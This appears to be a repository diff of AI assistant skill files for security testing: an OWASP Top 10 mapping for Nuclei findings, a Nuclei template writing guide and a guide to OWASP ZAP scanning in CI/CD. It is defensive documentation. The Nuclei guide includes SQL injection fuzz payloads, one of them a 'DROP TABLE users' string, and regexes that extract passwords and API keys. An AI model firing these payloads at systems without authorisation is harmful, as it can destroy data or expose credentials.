- `privilege-escalation` - Privilege escalation issues
### Common Findings
- **Exposed Admin Panels**: `/admin`, `/administrator`, `/wp-admin` accessible without authentication
- **Directory Listing**: Open directory listings exposing sensitive files
- **Backup Files Exposed**: `.bak`, `.sql`, `.zip` files publicly accessible
- **Git/SVN Exposure**: `.git`, `.svn` directories exposed
- **API Access Control**: Missing authorization checks on API endpoints
### Remediation Priority
**Critical** - Immediate action required for exposed admin panels and authentication bypasses
## A02:2021 - Cryptographic Failures
### Nuclei Template Tags
- `ssl` - SSL/TLS configuration issues
- `weak-crypto` - Weak cryptographic implementations
- `exposed-keys` - Exposed cryptographic keys
### Common Findings
- **Weak TLS Versions**: TLS 1.0, TLS 1.1 still enabled
- **Weak Cipher Suites**: RC4, DES, 3DES in use
- **Missing HSTS**: HTTP Strict Transport Security not configured
- **Self-Signed Certificates**: Invalid or self-signed SSL certificates
- **Exposed Private Keys**: Private keys in public repositories or directories
### Remediation Priority
**High** - Update to TLS 1.2+ and modern cipher suites
## A03:2021 - Injection
### Nuclei Template Tags
- `sqli` - SQL Injection
- `xss` - Cross-Site Scripting
- `xxe` - XML External Entity
- `ssti` - Server-Side Template Injection
- `nosqli` - NoSQL Injection
- `cmdi` - Command Injection
### Common Findings
- **SQL Injection**: User input reflected in database queries
- **Cross-Site Scripting (XSS)**: Reflected, Stored, and DOM-based XSS
- **Command Injection**: OS command execution via user input
- **LDAP Injection**: LDAP query manipulation
- **Template Injection**: Server-side template injection in Jinja2, Twig, etc.
### Remediation Priority
**Critical** - SQL Injection and Command Injection require immediate remediation
## A04:2021 - Insecure Design
### Nuclei Template Tags
- `logic` - Business logic flaws
- `workflow` - Workflow bypass vulnerabilities
### Common Findings
- **Rate Limiting Bypass**: Missing rate limiting on authentication endpoints
- **Workflow Bypass**: Steps in business processes can be skipped
- **Insufficient Resource Allocation**: No limits on resource consumption
- **Unvalidated Redirects**: Open redirect vulnerabilities
### Remediation Priority
**Medium to High** - Depends on business impact and exploitability
## A05:2021 - Security Misconfiguration
### Nuclei Template Tags
- `misconfig` - Generic misconfigurations
- `headers` - Missing security headers
- `cors` - CORS misconfigurations
- `debug` - Debug modes enabled in production
### Common Findings
- **Missing Security Headers**:
- `Content-Security-Policy`
- `X-Frame-Options`
- `X-Content-Type-Options`
- `Strict-Transport-Security`
- **CORS Misconfiguration**: `Access-Control-Allow-Origin: *`
- **Debug Mode Enabled**: Stack traces, verbose errors in production
- **Default Configurations**: Unchanged default credentials and settings
- **Directory Indexing**: Apache/Nginx directory listing enabled
### Remediation Priority
**Medium** - Apply hardening configurations and remove debug modes
## A06:2021 - Vulnerable and Outdated Components
### Nuclei Template Tags
- `cve` - Known CVE vulnerabilities
- `eol` - End-of-life software
- `outdated` - Outdated software versions
### Common Findings
- **Known CVEs**: Outdated libraries with public CVEs (Log4Shell, Spring4Shell, etc.)
- **End-of-Life Software**: Unsupported versions of frameworks and libraries
- **Vulnerable JavaScript Libraries**: jQuery, Angular, React with known vulnerabilities
- **CMS Vulnerabilities**: WordPress, Drupal, Joomla plugin vulnerabilities
### Remediation Priority
**Critical to High** - Patch immediately based on CVSS score and exploitability
### Example CVE Mappings
```
CVE-2021-44228 (Log4Shell) → Critical → A06
CVE-2022-22965 (Spring4Shell) → Critical → A06
CVE-2017-5638 (Struts2 RCE) → Critical → A06
CVE-2021-26855 (Exchange ProxyLogon) → Critical → A06
```
## A07:2021 - Identification and Authentication Failures
### Nuclei Template Tags
- `auth` - Authentication issues
- `jwt` - JWT vulnerabilities
- `oauth` - OAuth misconfigurations
- `default-logins` - Default credentials
- `session` - Session management issues
### Common Findings
- **Default Credentials**: Admin/admin, root/root, default passwords
- **Weak Password Policies**: No complexity requirements
- **Session Fixation**: Session tokens not regenerated after login
- **JWT Vulnerabilities**: `alg=none` bypass, weak signing keys
- **Missing MFA**: No multi-factor authentication for privileged accounts
- **Predictable Session IDs**: Sequential or easily guessable tokens
### Remediation Priority
**High** - Change default credentials immediately, enforce strong password policies
## A08:2021 - Software and Data Integrity Failures
### Nuclei Template Tags
- `rce` - Remote Code Execution
- `deserialization` - Insecure deserialization
- `integrity` - Integrity check failures
### Common Findings
- **Insecure Deserialization**: Unsafe object deserialization in Java, Python, PHP
- **Unsigned Updates**: Software updates without signature verification
- **CI/CD Pipeline Compromise**: Insufficient pipeline security controls
- **Dependency Confusion**: Private packages replaced by public malicious packages
### Remediation Priority
**Critical** - Insecure deserialization leading to RCE requires immediate action
## A09:2021 - Security Logging and Monitoring Failures
### Nuclei Template Tags
- `logging` - Logging issues
- `monitoring` - Monitoring gaps
### Common Findings
- **Missing Audit Logs**: Authentication failures, access control violations not logged
- **Insufficient Log Retention**: Logs deleted too quickly for forensic analysis
- **No Alerting**: No real-time alerts for suspicious activities
- **Log Injection**: User input reflected in logs without sanitization
### Remediation Priority
**Low to Medium** - Improve logging and monitoring infrastructure
## A10:2021 - Server-Side Request Forgery (SSRF)
### Nuclei Template Tags
- `ssrf` - SSRF vulnerabilities
- `redirect` - Open redirect issues
### Common Findings
- **SSRF via URL Parameters**: User-controlled URLs fetched by server
- **Cloud Metadata Access**: SSRF accessing AWS/GCP/Azure metadata endpoints
- **Internal Port Scanning**: SSRF used to scan internal networks
- **Webhook Vulnerabilities**: SSRF via webhook URLs
### Remediation Priority
**High to Critical** - Especially if cloud metadata or internal services accessible
## Severity Mapping Guide
Use this table to map Nuclei severity levels to OWASP categories:
| Nuclei Severity | OWASP Priority | Action Required |
|-----------------|----------------|-----------------|
| **Critical** | P0 - Immediate | Patch within 24 hours |
| **High** | P1 - Urgent | Patch within 7 days |
| **Medium** | P2 - Important | Patch within 30 days |
| **Low** | P3 - Normal | Patch in next release cycle |
| **Info** | P4 - Informational | Document and track |
## Integration with Security Workflows
### Finding Triage Process
1. **Critical/High Findings**: Assign to security team immediately
2. **Verify Exploitability**: Confirm with manual testing
3. **Map to OWASP**: Use this guide to categorize findings
4. **Assign Remediation Owner**: Development team or infrastructure team
5. **Track in JIRA/GitHub**: Create tickets with OWASP category labels
6. **Re-scan After Fix**: Verify vulnerability is resolved
### Reporting Template
```markdown
## Security Finding: [Nuclei Template ID]
**OWASP Category**: A03:2021 - Injection
**Severity**: Critical
**CWE**: CWE-89 (SQL Injection)
**CVE**: CVE-2024-XXXXX (if applicable)
### Description
[Description from Nuclei output]
### Affected URLs
- https://target-app.com/api/users?id=1
### Remediation
Use parameterized queries instead of string concatenation.
### References
- [OWASP SQL Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)
```
## Additional Resources
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
- [Nuclei Templates Repository](https://github.com/projectdiscovery/nuclei-templates)

View File

@@ -0,0 +1,637 @@
# Nuclei Template Development Guide
## Table of Contents
- [Template Structure](#template-structure)
- [Template Types](#template-types)
- [Matchers and Extractors](#matchers-and-extractors)
- [Advanced Techniques](#advanced-techniques)
- [Testing and Validation](#testing-and-validation)
- [Best Practices](#best-practices)
## Template Structure
### Basic Template Anatomy
```yaml
id: unique-template-id
info:
name: Human-readable template name
author: your-name
severity: critical|high|medium|low|info
description: Detailed description of what this template detects
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-XXXXX
- https://nvd.nist.gov/vuln/detail/CVE-2024-XXXXX
tags: cve,owasp,misconfig,custom
# Template type: http, dns, network, file, etc.
http:
- method: GET
path:
- "{{BaseURL}}/vulnerable-endpoint"
matchers:
- type: status
status:
- 200
- type: word
words:
- "vulnerable signature"
```
### Required Fields
- **id**: Unique identifier (kebab-case, organization-scoped for custom templates)
- **info.name**: Clear, descriptive name
- **info.author**: Template author
- **info.severity**: One of: critical, high, medium, low, info
- **info.description**: What vulnerability this detects
- **info.tags**: Searchable tags for filtering
### Optional but Recommended Fields
- **info.reference**: Links to CVE, advisories, documentation
- **info.classification**: CWE, CVE, OWASP mappings
- **info.metadata**: Additional metadata (max-request, verified, etc.)
## Template Types
### HTTP Templates
Most common template type for web application testing:
```yaml
id: http-example
info:
name: HTTP Template Example
author: security-team
severity: high
tags: web,http
http:
- method: GET
path:
- "{{BaseURL}}/api/users"
- "{{BaseURL}}/api/admin"
headers:
Authorization: "Bearer {{token}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "\"role\":\"admin\""
- "sensitive_data"
extractors:
- type: regex
name: user_ids
regex:
- '"id":([0-9]+)'
```
### DNS Templates
Test for DNS misconfigurations and subdomain takeovers:
```yaml
id: dns-takeover-check
info:
name: DNS Subdomain Takeover Detection
author: security-team
severity: high
tags: dns,takeover
dns:
- name: "{{FQDN}}"
type: CNAME
matchers:
- type: word
words:
- "amazonaws.com"
- "azurewebsites.net"
- "herokuapp.com"
```
### Network Templates
TCP/UDP port scanning and service detection:
```yaml
id: exposed-redis
info:
name: Exposed Redis Instance
author: security-team
severity: critical
tags: network,redis,exposure
network:
- inputs:
- data: "*1\r\n$4\r\ninfo\r\n"
host:
- "{{Hostname}}"
- "{{Hostname}}:6379"
matchers:
- type: word
words:
- "redis_version"
```
## Matchers and Extractors
### Matcher Types
#### Status Matcher
```yaml
matchers:
- type: status
status:
- 200
- 201
condition: or
```
#### Word Matcher
```yaml
matchers:
- type: word
part: body # body, header, all
words:
- "error"
- "exception"
condition: and
case-insensitive: true
```
#### Regex Matcher
```yaml
matchers:
- type: regex
regex:
- "(?i)password\\s*=\\s*['\"]([^'\"]+)['\"]"
part: body
```
#### Binary Matcher
```yaml
matchers:
- type: binary
binary:
- "504B0304" # ZIP file signature (hex)
part: body
```
#### DSL Matcher (Dynamic Expressions)
```yaml
matchers:
- type: dsl
dsl:
- "status_code == 200 && len(body) > 1000"
- "contains(tolower(body), 'admin')"
```
### Matcher Conditions
- **and**: All matchers must match
- **or**: At least one matcher must match (default)
```yaml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "admin"
```
### Extractors
Extract data from responses for reporting or chaining:
#### Regex Extractor
```yaml
extractors:
- type: regex
name: api_keys
part: body
regex:
- 'api[_-]?key["\s:=]+([a-zA-Z0-9_-]{32,})'
group: 1
```
#### JSON Extractor
```yaml
extractors:
- type: json
name: user_data
json:
- ".users[].email"
- ".users[].id"
```
#### XPath Extractor
```yaml
extractors:
- type: xpath
name: titles
xpath:
- "//title"
```
## Advanced Techniques
### Request Chaining (Workflows)
Execute templates in sequence, passing data between them:
```yaml
id: workflow-example
info:
name: Multi-Step Authentication Test
author: security-team
workflows:
templates:
- template: login.yaml
- template: fetch-user-data.yaml
```
**login.yaml**:
```yaml
id: login-template
info:
name: Login and Extract Token
author: security-team
severity: info
http:
- method: POST
path:
- "{{BaseURL}}/api/login"
body: '{"username":"test","password":"test"}'
extractors:
- type: json
name: auth_token
json:
- ".token"
internal: true # Pass to next template
```
### Variables and Helpers
Use dynamic variables and helper functions:
```yaml
http:
- method: GET
path:
- "{{BaseURL}}/api/users/{{username}}"
# Available variables:
# {{BaseURL}}, {{Hostname}}, {{Host}}, {{Port}}, {{Path}}
# {{RootURL}}, {{Scheme}}, {{username}} (from previous extractor)
matchers:
- type: dsl
dsl:
# Helper functions: len(), contains(), regex_match(), etc.
- 'len(body) > 500'
- 'contains(tolower(header), "x-api-key")'
- 'status_code >= 200 && status_code < 300'
```
### Payloads and Fuzzing
Use payload files for fuzzing:
```yaml
id: sqli-fuzzing
info:
name: SQL Injection Fuzzing
author: security-team
severity: critical
http:
- method: GET
path:
- "{{BaseURL}}/api/users?id={{payload}}"
payloads:
payload:
- "1' OR '1'='1"
- "1' UNION SELECT NULL--"
- "'; DROP TABLE users--"
matchers:
- type: word
words:
- "SQL syntax"
- "mysql_fetch"
- "ORA-01756"
```
Or use external payload file:
```yaml
payloads:
payload: payloads/sql-injection.txt
attack: clusterbomb # pitchfork, clusterbomb, batteringram
```
### Rate Limiting and Threads
Control request rate to avoid overwhelming targets:
```yaml
id: rate-limited-scan
info:
name: Rate-Limited Vulnerability Scan
author: security-team
severity: medium
metadata:
max-request: 50 # Maximum requests per template execution
http:
- method: GET
path:
- "{{BaseURL}}/api/endpoint"
threads: 5 # Concurrent requests (default: 25)
```
## Testing and Validation
### Local Testing
Test templates against local test servers:
```bash
# Test single template
nuclei -t custom-templates/my-template.yaml -u http://localhost:8080 -debug
# Validate template syntax
nuclei -t custom-templates/my-template.yaml -validate
# Test with verbose output
nuclei -t custom-templates/my-template.yaml -u https://target.com -verbose
```
### Template Validation
Use the bundled validation script:
```bash
python3 scripts/template_validator.py custom-templates/my-template.yaml
```
### Test Lab Setup
Create a vulnerable test application for template development:
```bash
# Use DVWA (Damn Vulnerable Web Application)
docker run -d -p 80:80 vulnerables/web-dvwa
# Or OWASP Juice Shop
docker run -d -p 3000:3000 bkimminich/juice-shop
```
## Best Practices
### 1. Accurate Severity Classification
- **Critical**: RCE, authentication bypass, full system compromise
- **High**: SQL injection, XSS, significant data exposure
- **Medium**: Missing security headers, information disclosure
- **Low**: Minor misconfigurations, best practice violations
- **Info**: Technology detection, non-security findings
### 2. Minimize False Positives
```yaml
# Use multiple matchers with AND condition
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "admin"
- "dashboard"
condition: and
- type: regex
regex:
- '<title>.*Admin.*Panel.*</title>'
case-insensitive: true
```
### 3. Clear Naming Conventions
- **id**: `organization-vulnerability-type-identifier`
- Example: `acme-api-key-exposure-config`
- **name**: Descriptive, clear purpose
- Example: "ACME Corp API Key Exposure in Config Endpoint"
### 4. Comprehensive Documentation
```yaml
info:
name: Detailed Template Name
description: |
Comprehensive description of what this template detects,
why it's important, and how it works.
References:
- CVE-2024-XXXXX
- Internal ticket: SEC-1234
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-XXXXX
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-XXXXX
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-XXXXX
cwe-id: CWE-89
metadata:
verified: true
max-request: 10
shodan-query: 'http.title:"Admin Panel"'
tags: cve,owasp,sqli,high-severity,verified
```
### 5. Responsible Testing Parameters
```yaml
# Avoid aggressive fuzzing in default templates
info:
metadata:
max-request: 10 # Limit total requests
http:
- method: GET
threads: 5 # Limit concurrent requests
# Use specific, targeted payloads
payloads:
test: ["safe-payload-1", "safe-payload-2"]
```
### 6. Error Handling
```yaml
http:
- method: GET
path:
- "{{BaseURL}}/api/test"
# Handle various response scenarios
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body, 'vulnerable')"
- "status_code == 500 && contains(body, 'error')"
condition: or
# Negative matchers (must NOT match)
matchers:
- type: word
negative: true
words:
- "404 Not Found"
- "403 Forbidden"
```
### 7. Template Organization
```
custom-templates/
├── api/
│ ├── api-key-exposure.yaml
│ ├── graphql-introspection.yaml
│ └── rest-api-misconfig.yaml
├── cves/
│ ├── 2024/
│ │ ├── CVE-2024-12345.yaml
│ │ └── CVE-2024-67890.yaml
├── exposures/
│ ├── sensitive-files.yaml
│ └── backup-exposure.yaml
└── misconfig/
├── cors-misconfiguration.yaml
└── debug-mode-enabled.yaml
```
### 8. Version Control and Maintenance
- Use Git to track template changes
- Tag templates with version numbers in metadata
- Document changes in template comments
- Regularly test templates against updated applications
```yaml
info:
metadata:
version: 1.2.0
last-updated: 2024-11-20
changelog: |
1.2.0 - Added additional matcher for new vulnerability variant
1.1.0 - Improved regex pattern to reduce false positives
1.0.0 - Initial release
```
## Example: Complete Custom Template
```yaml
id: acme-corp-api-debug-exposure
info:
name: ACME Corp API Debug Endpoint Exposure
author: acme-security-team
severity: high
description: |
Detects exposed debug endpoint in ACME Corp API that leaks
sensitive configuration including database credentials,
API keys, and internal service URLs.
reference:
- https://internal-wiki.acme.com/security/SEC-1234
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
metadata:
verified: true
max-request: 3
version: 1.0.0
tags: acme,api,exposure,debug,high-severity
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/debug/config"
- "{{BaseURL}}/api/v2/debug/config"
- "{{BaseURL}}/debug/config"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "database_url"
- "api_secret_key"
condition: or
- type: regex
part: body
regex:
- '"(password|secret|token)":\s*"[^"]+"'
extractors:
- type: regex
name: exposed_secrets
part: body
regex:
- '"(database_url|api_secret_key|jwt_secret)":\s*"([^"]+)"'
group: 2
- type: json
name: config_data
json:
- ".database_url"
- ".api_secret_key"
```
## Resources
- [Official Nuclei Template Guide](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Templates Repository](https://github.com/projectdiscovery/nuclei-templates)
- [Template Editor](https://templates.nuclei.sh/)
- [DSL Functions Reference](https://docs.projectdiscovery.io/templates/reference/matchers#dsl-matcher)

View File

@@ -0,0 +1,444 @@
---
name: dast-zap
description: >
Dynamic application security testing (DAST) using OWASP ZAP (Zed Attack Proxy) with passive and active scanning,
API testing, and OWASP Top 10 vulnerability detection. Use when: (1) Performing runtime security testing of web
applications and APIs, (2) Detecting vulnerabilities like XSS, SQL injection, and authentication flaws in deployed
applications, (3) Automating security scans in CI/CD pipelines with Docker containers, (4) Conducting authenticated
testing with session management, (5) Generating security reports with OWASP and CWE mappings for compliance.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [dast, zap, web-security, owasp, vulnerability-scanning, api-testing, penetration-testing]
frameworks: [OWASP, CWE]
dependencies:
tools: [docker]
optional: [python3, java]
references:
- https://www.zaproxy.org/docs/
- https://www.zaproxy.org/docs/docker/
- https://www.zaproxy.org/docs/desktop/start/features/
---
# DAST with OWASP ZAP
## Overview
OWASP ZAP (Zed Attack Proxy) is an open-source DAST tool that acts as a manipulator-in-the-middle proxy to intercept,
inspect, and test web application traffic for security vulnerabilities. ZAP provides automated passive and active
scanning, API testing capabilities, and seamless CI/CD integration for runtime security testing.
## Quick Start
### Baseline Scan (Docker)
Run a quick passive security scan:
```bash
docker run -t zaproxy/zap-stable zap-baseline.py -t https://target-app.com -r baseline-report.html
```
### Full Active Scan (Docker)
Perform comprehensive active vulnerability testing:
```bash
docker run -t zaproxy/zap-stable zap-full-scan.py -t https://target-app.com -r full-scan-report.html
```
### API Scan with OpenAPI Spec
Test APIs using OpenAPI/Swagger specification:
```bash
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.target.com \
-f openapi \
-d /zap/wrk/openapi-spec.yaml \
-r /zap/wrk/api-report.html
```
## Core Workflow
### Step 1: Define Scan Scope and Target
Identify the target application URL and define scope:
```bash
# Set target URL
TARGET_URL="https://target-app.com"
# For authenticated scans, prepare authentication context
# See references/authentication_guide.md for detailed setup
```
**Scope Considerations:**
- Exclude third-party domains and CDN URLs
- Include all application subdomains and API endpoints
- Respect scope limitations in penetration testing engagements
### Step 2: Run Passive Scanning
Execute passive scanning to analyze traffic without active attacks:
```bash
# Baseline scan performs spidering + passive scanning
docker run -t zaproxy/zap-stable zap-baseline.py \
-t $TARGET_URL \
-r baseline-report.html \
-J baseline-report.json
```
**What Passive Scanning Detects:**
- Missing security headers (CSP, HSTS, X-Frame-Options)
- Information disclosure in responses
- Cookie security issues (HttpOnly, Secure flags)
- Basic authentication weaknesses
- Application fingerprinting data
### Step 3: Execute Active Scanning
Perform active vulnerability testing (requires authorization):
```bash
# Full scan includes spidering + passive + active scanning
docker run -t zaproxy/zap-stable zap-full-scan.py \
-t $TARGET_URL \
-r full-scan-report.html \
-J full-scan-report.json \
-z "-config api.addrs.addr.name=.* -config api.addrs.addr.regex=true"
```
**Active Scanning Coverage:**
- SQL Injection (SQLi)
- Cross-Site Scripting (XSS)
- Path Traversal
- Command Injection
- XML External Entity (XXE)
- Server-Side Request Forgery (SSRF)
- Security Misconfigurations
**WARNING:** Active scanning performs real attacks. Only run against applications you have explicit authorization to test.
### Step 4: Test APIs with Specifications
Scan REST, GraphQL, and SOAP APIs:
```bash
# OpenAPI/Swagger API scan
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.target.com \
-f openapi \
-d /zap/wrk/openapi.yaml \
-r /zap/wrk/api-report.html
# GraphQL API scan
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.target.com/graphql \
-f graphql \
-d /zap/wrk/schema.graphql \
-r /zap/wrk/graphql-report.html
```
Consult `references/api_testing_guide.md` for advanced API testing patterns including authentication and rate limiting.
### Step 5: Handle Authentication
For testing authenticated application areas:
```bash
# Use bundled script for authentication setup
python3 scripts/zap_auth_scanner.py \
--target $TARGET_URL \
--auth-type form \
--login-url https://target-app.com/login \
--username testuser \
--password-env ZAP_AUTH_PASSWORD \
--output auth-scan-report.html
```
Authentication methods supported:
- Form-based authentication
- HTTP Basic/Digest authentication
- OAuth 2.0 flows
- API key/token authentication
- Script-based custom authentication
See `references/authentication_guide.md` for detailed authentication configuration.
### Step 6: Analyze Results and Generate Reports
Review findings by risk level:
```bash
# Generate multiple report formats
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-full-scan.py \
-t $TARGET_URL \
-r /zap/wrk/report.html \
-J /zap/wrk/report.json \
-x /zap/wrk/report.xml
```
**Risk Levels:**
- **High**: Critical vulnerabilities requiring immediate remediation (SQLi, RCE, authentication bypass)
- **Medium**: Significant security weaknesses (XSS, CSRF, sensitive data exposure)
- **Low**: Security concerns with lower exploitability (information disclosure, minor misconfigurations)
- **Informational**: Security best practices and observations
Map findings to OWASP Top 10 using `references/owasp_mapping.md`.
## Automation & CI/CD Integration
### GitHub Actions Integration
Add ZAP scanning to GitHub workflows:
```yaml
# .github/workflows/zap-scan.yml
name: ZAP Security Scan
on: [push, pull_request]
jobs:
zap_scan:
runs-on: ubuntu-latest
name: OWASP ZAP Baseline Scan
steps:
- name: Checkout
uses: actions/checkout@v2
- name: ZAP Baseline Scan
uses: zaproxy/action-baseline@v0.7.0
with:
target: 'https://staging.target-app.com'
rules_file_name: '.zap/rules.tsv'
cmd_options: '-a'
```
### Docker Automation Framework
Use YAML-based automation for advanced workflows:
```bash
# Create automation config (see assets/zap_automation.yaml)
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable \
zap.sh -cmd -autorun /zap/wrk/zap_automation.yaml
```
The bundled `assets/zap_automation.yaml` template includes:
- Environment configuration
- Spider and AJAX spider settings
- Passive and active scan policies
- Authentication configuration
- Report generation
### CI/CD Best Practices
- Use **baseline scans** for every commit/PR (low false positives)
- Run **full scans** on staging environments before production deployment
- Configure **API scans** for microservices and REST endpoints
- Set **failure thresholds** to break builds on high-severity findings
- Generate **SARIF reports** for GitHub Security tab integration
See `scripts/ci_integration.sh` for complete CI/CD integration examples.
## Security Considerations
- **Authorization**: Always obtain written authorization before scanning production systems or third-party applications
- **Rate Limiting**: Configure scan speed to avoid overwhelming target applications or triggering DDoS protections
- **Sensitive Data**: Never include production credentials in scan configurations; use environment variables or secrets management
- **Scan Timing**: Run active scans during maintenance windows or against dedicated testing environments
- **Legal Compliance**: Adhere to computer fraud and abuse laws; unauthorized scanning may be illegal
- **Audit Logging**: Log all scan executions, targets, findings, and remediation actions for compliance audits
- **Data Retention**: Sanitize scan reports before sharing; they may contain sensitive application data
- **False Positives**: Manually verify findings before raising security incidents; DAST tools generate false positives
## Bundled Resources
### Scripts (`scripts/`)
- `zap_baseline_scan.sh` - Automated baseline scanning with configurable targets and reporting
- `zap_full_scan.sh` - Comprehensive active scanning with exclusion rules
- `zap_api_scan.py` - API testing with OpenAPI/GraphQL specification support
- `zap_auth_scanner.py` - Authenticated scanning with multiple authentication methods
- `ci_integration.sh` - CI/CD integration examples for Jenkins, GitLab CI, GitHub Actions
### References (`references/`)
- `authentication_guide.md` - Complete authentication configuration for form-based, OAuth, and token authentication
- `owasp_mapping.md` - Mapping of ZAP alerts to OWASP Top 10 2021 and CWE classifications
- `api_testing_guide.md` - Advanced API testing patterns for REST, GraphQL, SOAP, and WebSocket
- `scan_policies.md` - Custom scan policy configuration for different application types
- `false_positive_handling.md` - Common false positives and verification techniques
### Assets (`assets/`)
- `zap_automation.yaml` - Automation framework configuration template
- `zap_context.xml` - Context configuration with authentication and session management
- `scan_policy_modern_web.policy` - Scan policy optimized for modern JavaScript applications
- `scan_policy_api.policy` - Scan policy for REST and GraphQL APIs
- `github_action.yml` - GitHub Actions workflow template
- `gitlab_ci.yml` - GitLab CI pipeline template
## Common Patterns
### Pattern 1: Progressive Scanning (Speed vs. Coverage)
Start with fast scans and progressively increase depth:
```bash
# Stage 1: Quick baseline scan (5-10 minutes)
docker run -t zaproxy/zap-stable zap-baseline.py -t $TARGET_URL -r baseline.html
# Stage 2: Full spider + passive scan (15-30 minutes)
docker run -t zaproxy/zap-stable zap-baseline.py -t $TARGET_URL -r baseline.html -c baseline-rules.tsv
# Stage 3: Targeted active scan on critical endpoints (1-2 hours)
docker run -t zaproxy/zap-stable zap-full-scan.py -t $TARGET_URL -r full.html -c full-rules.tsv
```
### Pattern 2: API-First Testing
Prioritize API security testing:
```bash
# 1. Test API endpoints with specification
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.target.com -f openapi -d /zap/wrk/openapi.yaml -r /zap/wrk/api.html
# 2. Run active scan on discovered API endpoints
# (ZAP automatically includes spidered API routes)
# 3. Test authentication flows
python3 scripts/zap_auth_scanner.py --target https://api.target.com --auth-type bearer --token-env API_TOKEN
```
### Pattern 3: Authenticated Web Application Testing
Test complete application including protected areas:
```bash
# 1. Configure authentication context
# See assets/zap_context.xml for template
# 2. Run authenticated scan
python3 scripts/zap_auth_scanner.py \
--target https://app.target.com \
--auth-type form \
--login-url https://app.target.com/login \
--username testuser \
--password-env APP_PASSWORD \
--verification-url https://app.target.com/dashboard \
--output authenticated-scan.html
# 3. Review session-specific vulnerabilities (CSRF, privilege escalation)
```
### Pattern 4: CI/CD Security Gate
Implement ZAP as a security gate in deployment pipelines:
```bash
# Run baseline scan and fail build on high-risk findings
docker run -t zaproxy/zap-stable zap-baseline.py \
-t https://staging.target.com \
-r baseline-report.html \
-J baseline-report.json \
--hook=scripts/ci_integration.sh
# Check exit code
if [ $? -ne 0 ]; then
echo "Security scan failed! High-risk vulnerabilities detected."
exit 1
fi
```
## Integration Points
- **CI/CD**: GitHub Actions, GitLab CI, Jenkins, Azure DevOps, CircleCI
- **Issue Tracking**: Jira, GitHub Issues (via SARIF), ServiceNow
- **Security Tools**: Defect Dojo (vulnerability management), SonarQube, OWASP Dependency-Check
- **SDLC**: Pre-production testing phase, security regression testing, penetration testing preparation
- **Authentication**: Integrates with OAuth providers, SAML, API gateways, custom authentication scripts
- **Reporting**: HTML, JSON, XML, Markdown, SARIF (for GitHub Security), PDF (via custom scripts)
## Troubleshooting
### Issue: Docker Container Cannot Reach Target Application
**Solution**: For scanning applications running on localhost or in other containers:
```bash
# Scanning host application from Docker container
# Use docker0 bridge IP instead of localhost
HOST_IP=$(ip -4 addr show docker0 | grep -Po 'inet \K[\d.]+')
docker run -t zaproxy/zap-stable zap-baseline.py -t http://$HOST_IP:8080
# Scanning between containers - create shared network
docker network create zap-network
docker run --network zap-network -t zaproxy/zap-stable zap-baseline.py -t http://app-container:8080
```
### Issue: Scan Completes Too Quickly (Incomplete Coverage)
**Solution**: Increase spider depth and scan duration:
```bash
# Configure spider to crawl deeper
docker run -t zaproxy/zap-stable zap-baseline.py \
-t $TARGET_URL \
-r report.html \
-z "-config spider.maxDepth=10 -config spider.maxDuration=60"
```
For JavaScript-heavy applications, use AJAX spider or Automation Framework.
### Issue: High False Positive Rate
**Solution**: Create custom scan policy and rules file:
```bash
# Use bundled false positive handling guide
# See references/false_positive_handling.md
# Generate rules file to suppress false positives
# Format: alert_id URL_pattern parameter CWE_id WARN|IGNORE|FAIL
echo "10202 https://target.com/static/.* .* 798 IGNORE" >> .zap/rules.tsv
docker run -t zaproxy/zap-stable zap-baseline.py -t $TARGET_URL -c .zap/rules.tsv
```
### Issue: Authentication Session Expires During Scan
**Solution**: Configure session re-authentication:
```bash
# Use bundled authentication script with session monitoring
python3 scripts/zap_auth_scanner.py \
--target $TARGET_URL \
--auth-type form \
--login-url https://target.com/login \
--username testuser \
--password-env PASSWORD \
--re-authenticate-on 401,403 \
--verification-interval 300
```
### Issue: Scan Triggering Rate Limiting or WAF Blocking
**Solution**: Reduce scan aggressiveness:
```bash
# Slower scan with delays between requests
docker run -t zaproxy/zap-stable zap-baseline.py \
-t $TARGET_URL \
-r report.html \
-z "-config scanner.threadPerHost=1 -config scanner.delayInMs=1000"
```
## References
- [OWASP ZAP Documentation](https://www.zaproxy.org/docs/)
- [ZAP Docker Documentation](https://www.zaproxy.org/docs/docker/)
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [ZAP Automation Framework](https://www.zaproxy.org/docs/automate/automation-framework/)
- [GitHub Actions for ZAP](https://github.com/zaproxy/action-baseline)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,207 @@
# GitHub Actions Workflow for OWASP ZAP Security Scanning
# Place this file in .github/workflows/zap-security-scan.yml
name: OWASP ZAP Security Scan
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
schedule:
# Run weekly security scans on Sunday at 2 AM
- cron: '0 2 * * 0'
